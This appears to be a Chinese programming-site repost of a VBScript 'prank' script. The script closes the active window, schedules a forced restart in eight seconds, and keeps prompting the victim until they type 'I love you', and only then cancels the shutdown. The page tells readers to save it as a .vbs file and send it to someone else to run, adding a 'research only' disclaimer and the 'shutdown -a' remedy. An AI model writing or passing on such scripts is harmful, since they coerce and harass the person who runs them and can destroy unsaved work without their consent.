当前位置: 移动技术网 > IT编程>脚本编程>VBScript > Crack8 VBS整人脚本 你不说你爱我 就关机

Crack8 VBS整人脚本 你不说你爱我 就关机

2017年12月08日  | 移动技术网IT编程  | 我要评论

林倩,淄博聊天室,料理机哪个牌子好

复制代码 代码如下:

set ierunner=createobject("wscript.shell")
ierunner.run "cmd /c start http://www.baidu.com/",0
wscript.sleep 2000
ierunner.sendkeys "%{f4}"
on error resume next
dim wshshella
set wshshella = wscript.createobject("wscript.shell")
wshshella.run "cmd.exe /c shutdown -r -t 8 -c ""快说你爱我···"" ",0 ,true
dim a
do while(a <> "我爱你")
a = inputbox ("说你爱我,就不关机,快点,说 ""我爱你"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"msgbox"
loop
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim wshshell
set wshshell = wscript.createobject("wscript.shell")
wshshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"

把分隔线里面的内容保存为任意.vbs的文件名 发送给对方运行就ok
解除方法 开始 运行 shutdown -a 回车 怕女的不太懂什么解除 特别说明crack8_编程小组[k.8] 各种群共享都有这分源码 仅供研究 请勿非法用途

如对本文有疑问,请在下面进行留言讨论,广大热心网友会与你互动!! 点击进行留言回复

相关文章:

验证码:
移动技术网